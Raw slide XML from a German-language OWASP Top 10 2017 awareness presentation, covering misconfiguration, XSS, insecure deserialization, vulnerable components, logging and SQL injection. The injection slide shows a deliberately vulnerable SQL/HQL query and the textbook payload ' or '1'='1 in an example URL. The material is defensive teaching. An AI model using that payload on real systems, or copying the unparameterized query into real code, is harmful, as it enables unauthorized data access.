              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A6:2017-Sicher-heitsrelevante</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Fehlkonfiguration</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Freeform 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4E0F83D-B235-48A5-A352-7B6BBC2BAE17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="6292800"/>
            <a:ext cx="5218177" cy="756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de-DE" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS tritt auf, wenn Anwendungen nicht vertrauenswürdige Daten entgegennehmen und ohne Validierung oder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Umkodierung</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an einen Webbrowser senden. XSS tritt auch auf, wenn eine Anwendung HTML- oder JavaScript-Code auf Basis von Nutzereingaben erzeugt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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XSS erlaubt es einem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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Angreifer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="90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Scriptcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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im Browser eines Opfers auszuführen und so Benutzersitzungen zu übernehmen, Seiteninhalte verändert anzuzeigen oder d</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en Benutzer auf bösartige Seiten umzuleiten.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Freeform 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC128063-7A66-4F34-A720-2EAB6E988467}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="6303983"/>
            <a:ext cx="1486800"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A7:2017-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Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Freeform 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E895283-6404-4647-9AED-A7928C930CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="7268400"/>
            <a:ext cx="5218177" cy="540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de-DE" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unsichere, weil unzureichend geprüfte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Deserialisierungen</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können zu Remote-Code-</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Execution</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Schwachstellen führen. Aber auch wenn das nicht der Fall ist, können Deserialisierungsfehler Angriffsmuster wie Replay-Angriffe,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Injections</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und Erschleichung erweiterter Zugriffsrechte ermöglichen.</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4" name="Freeform 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1770D43A-73DB-44C0-AF41-71E9A314BA2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="7173879"/>
            <a:ext cx="1486800"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A8:2017-Unsichere Deserialisierung</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Freeform 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D3ABA2A-B6B4-4A1F-B3F6-D4C323A211D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="8078400"/>
            <a:ext cx="5218177" cy="6552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de-DE" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Komponenten wie Bibliotheken, Frameworks etc. werden mit den Berechtigungen der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zugehöri</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-gen Anwendung ausgeführt. Wird eine verwundbare Komponente ausgenutzt, kann ein solcher Angriff von Datenverlusten bis hin zu einer Übernahme des Systems führen. Applikationen und </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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APIs,</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die Komponenten mit bekannten Schwachstellen einsetzen, können Schutzmaßnahmen unterlaufen und so Angriffe mit schwerwiegenden Auswirkungen verursachen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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Freeform 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591F4221-9110-4B57-9D5B-633059706604}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="8038879"/>
            <a:ext cx="1486800"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36000" tIns="60192" rIns="36000"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A9:2017-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nutzung von Komponenten mit bekannten Schwachstellen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Freeform 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49216BAC-D272-467A-B5B1-631A0C551A99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="8953200"/>
            <a:ext cx="5218177" cy="648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de-DE" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unzureichendes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Logging</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und Monitoring führt zusammen mit fehlender oder uneffektiver Reaktion auf Vorfälle zu andauernden oder wiederholten Angriffen. Auch können Angreifer dadurch in Netzwerken weiter vordringen und Daten entwenden, verändern oder zerstören. Viele Studien zeigen, dass die Zeit bis zur Aufdeckung eines Angriffs bei ca. 200 Tagen liegt sowie typischer-weise durch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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Dritte </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entdeckt wird und nicht durch interne Überwachungs- und Kontrollmaßnahmen.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Freeform 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD39F83D-88CC-4839-86E9-886E3E768699}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75185" y="8910628"/>
            <a:ext cx="1486800"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A10:2017-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de-DE" sz="1200" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unzureichendes</a:t>
            </a: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 </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Logging &amp; Monitoring</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70585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Mögliche Angriffsszenarien</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Eine Anwendung nutzt ungeprüfte Eingabedaten für den Zusammenbau der folgenden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>verwundbaren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SQL-Abfrage:</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String query = "SELECT * FROM accounts WHERE</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endParaRPr lang="en-US" sz="900"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de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Auch das blinde Vertrauen in Frameworks kann zu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Querys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> führen, die ganz analog zu obigem Beispiel verwundbar sind (z.B. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hibernate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Query Language (HQL)):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Query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HQLQuery</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session.createQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("FROM accounts</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WHERE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de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In beiden Fällen kann ein Angreifer den ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’-Parameter in seinem Browser ändern und sendet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Zum Beispiel so:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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http://example.com/app/accountView?id=</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or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1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hierdurch wird die Logik der Anfrage verändert, so dass alle Datensätze der Tabelle „</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“ ohne Einschränkung auf einen Kunden zurückgegeben werden. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Gefährlichere Attacken wären z.B. das Ändern oder Löschen von Daten oder das Aufrufen von </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Procedures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</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Ist die Anwendung verwundbar?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Eine Anwendung ist für diesen Angriff verwundbar, wenn:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Daten, die vom Nutzer stammen, nicht ausreichend validiert, gefiltert oder durch geeignete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sanitizer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-Funktionen laufen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Dynamische Anfragen oder nicht-parametrisierte Aufrufe ohne ein dem Kontext (SQL, LDAP, XML usw.) entsprechendes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> direkt einem Interpreter übergeben werden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Bösartige Daten innerhalb von ORM („Objekt Relationales Mapping“)-Suchparametern genutzt werden können, um vertrauliche Datensätze eines Dritten zu extrahieren.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Bösartige Daten direkt oder als Teil zusammengesetzter dynamischer SQL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Querys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, Befehle oder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Procedures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> genutzt werden können.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1270" indent="-1270">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
